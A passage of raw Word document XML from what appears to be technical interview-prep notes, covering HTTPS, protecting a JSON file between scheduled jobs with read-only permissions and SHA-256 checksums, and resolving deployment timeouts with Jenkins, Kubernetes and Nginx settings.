        <w:t xml:space="preserve"> websites, not just those handling sensitive information, to adopt HTTPS for enhanced security and SEO benefits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CE57AC"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n summary, HTTPS is the secure version of HTTP and is essential for ensuring data privacy, security, and trustworthiness in modern web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1F87F1" w14:textId="2E987AE6" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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5F5DDA9C">
          <v:rect id="_x0000_i3646" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A3C5F5" w14:textId="2DF42849" w:rsidR="00B5508A" w:rsidRPr="00CE4B95" w:rsidRDefault="00953040">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="905" w:name="_Toc196308385"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Suppose in server one job at 9 AM and copy json file and paste it in temp folder another job 6 PM read it and load in db and no one should change the file. How to prevent file from any Change</w:t>
      </w:r>
      <w:r w:rsidR="00B5508A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="905"/>
    </w:p>
    <w:p w14:paraId="7B186D0B" w14:textId="2FA9F4F9" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To ensure that </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no one can change the JSON file</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> after it's copied to the temp folder at 9 AM and until it's read and loaded into the database at 6 PM, you can follow these strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731C2DAA" w14:textId="77777777" w:rsidR="001D4AC3"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037ED44">
          <v:rect id="_x0000_i3647" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B10B78A" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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1. Set File Permissions (Read-Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5DE872"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After copying the file at 9 AM, set </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-only permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the file so no user or process can modify it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAB49EA" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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On Linux/Unix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F4A16"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hmod 444 /path/to/temp/yourfile.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7109EAAE"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444 makes the file </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-only for owner, group, and others</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D1A5C" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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To set owner (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E690CB7"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hown root:root /path/to/temp/yourfile.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F19CBC1"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is ensures only root owns the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA8DF2" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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To make directory secure (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491446CB"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hmod 555 /path/to/temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ECB755"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Prevents writing to the directory itself (no file deletion or addition).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79420CB2" w14:textId="77777777" w:rsidR="001D4AC3"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C9626C3">
          <v:rect id="_x0000_i3648" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EDFA2D" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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2. Use File Locking (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A397BE"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Lock the file using system utilities or programming constructs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001368E"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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use FileChannel to apply a lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3996B9F5"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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use fcntl module for file locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6668B3B5"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But in your case, since the write process happens only once (9 AM), setting permissions is easier and sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C32070" w14:textId="77777777" w:rsidR="001D4AC3"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59F79C">
          <v:rect id="_x0000_i3649" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC041EE" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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3. Schedule Job with File Integrity Check (Extra Safety)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE07C0"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Create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like SHA256) of the JSON file after it's copied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066C24C0"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lastRenderedPageBreak/>
        <w:t>sha256sum yourfile.json &gt; checksum.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA7E9C"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Before reading/loading at 6 PM, verify the checksum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6834F6"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ha256sum -c checksum.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C498CF"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f the file has been tampered with, the check will fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25271611" w14:textId="77777777" w:rsidR="001D4AC3"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17CDD50">
          <v:rect id="_x0000_i3650" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67864DFC" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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4. Optionally Move to Secure Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266AA526"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Store the file in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>secured file server</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or mount with restricted access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E6C28"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S3 with IAM restrictions</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if using cloud storage like AWS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F983411" w14:textId="77777777" w:rsidR="001D4AC3"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E42FE09">
          <v:rect id="_x0000_i3651" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D123B7A" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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Summary Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F80A637"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opy file → /temp/yourfile.json at 9 AM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45755F3A"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mmediately run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D30657"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hmod 444 /temp/yourfile.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A72261"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hown root:root /temp/yourfile.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADEB6DD"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ha256sum /temp/yourfile.json &gt; /temp/yourfile_checksum.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19E4AD"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t 6 PM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056670A8" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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First verify checksum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FC8C29" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Load into DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499E467" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00CE4B95" w:rsidRDefault="001D4AC3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(Optionally) delete or archive the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33485BE2" w14:textId="44745FAB" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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5B32BC73">
          <v:rect id="_x0000_i3652" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="352BD6FD" w14:textId="1D7C698C" w:rsidR="00B5508A" w:rsidRPr="00CE4B95" w:rsidRDefault="00E12B8D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="906" w:name="_Toc196308386"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If we increase timeout then how can we resolve it? Deployment related issue and how will you handle it</w:t>
      </w:r>
      <w:r w:rsidR="00B5508A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="906"/>
    </w:p>
    <w:p w14:paraId="1C5798AE" w14:textId="70660F74" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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If you're facing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>timeout issue during deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, increasing the timeout is just a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>temporary workaround</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here's a structured way to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolve and handle the issue properly</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6789007C" w14:textId="77777777" w:rsidR="001D4AC3"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922719F">
          <v:rect id="_x0000_i3653" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE47482" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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Step-by-Step Approach to Handle Timeout in Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10566271" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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1. Identify the Cause of Timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0B39E7"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imeouts can happen due to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B93D3F"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Slow application startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F43B2"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Network issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3284EB24"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Docker image build taking too long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303D9800"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Readiness/liveness probes in Kubernetes failing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FCFC42"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I/CD job timeout (like Jenkins, GitHub Actions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15665C07"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Load balancer health check failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E5292D" w14:textId="77777777" w:rsidR="001D4AC3"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96DC9BC">
          <v:rect id="_x0000_i3654" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C695266" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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2. Increase Timeout (Temporary Fix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B15F4"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You can increase timeout in the relevant config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D61811"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Jenkins pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416629B4"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imeout(time: 20, unit: 'MINUTES') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075ABCF4"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 your deployment steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F98F5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546BD14F"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Kubernetes readiness probe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4749A987"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readinessProbe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9741C"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httpGet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE84EBB"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path: /health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E213FD1"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port: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C99ED45"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initialDelaySeconds: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383060AF"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timeoutSeconds: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9F3B7"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periodSeconds: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A077AAA"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  failureThreshold: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF994AA"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Nginx Ingress:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C90D7B"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proxy-connect-timeout 600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C170BB6"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proxy-send-timeout 600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2931C4"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proxy-read-timeout 600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1666EE5E" w14:textId="77777777" w:rsidR="001D4AC3"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3E11D7F">
          <v:rect id="_x0000_i3655" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D34E8A" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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lastRenderedPageBreak/>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Permanent Fix – Optimize the Root Caus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13"/>
        <w:gridCol w:w="6141"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="7E34D212" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1678B510" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC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Issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FC6F1BE" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="1C6D5D5A" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B6C0AC1"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App takes too long to start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AE55EAA"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Profile the startup; preload resources; reduce startup dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="75090724" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AA30503"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Heavy Docker build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B040A39"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Use multi-stage builds; cache layers; move to smaller base images</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="3C43FDC6" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7663F97E"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K8s probe failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74675C11"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Ensure /health endpoint is lightweight and fast; adjust delay/timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="3D3CD5FC" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="176B69AD"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I/CD pipeline timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EC1D609"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Break into smaller steps; add better logging; monitor slow steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="04E667C0" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
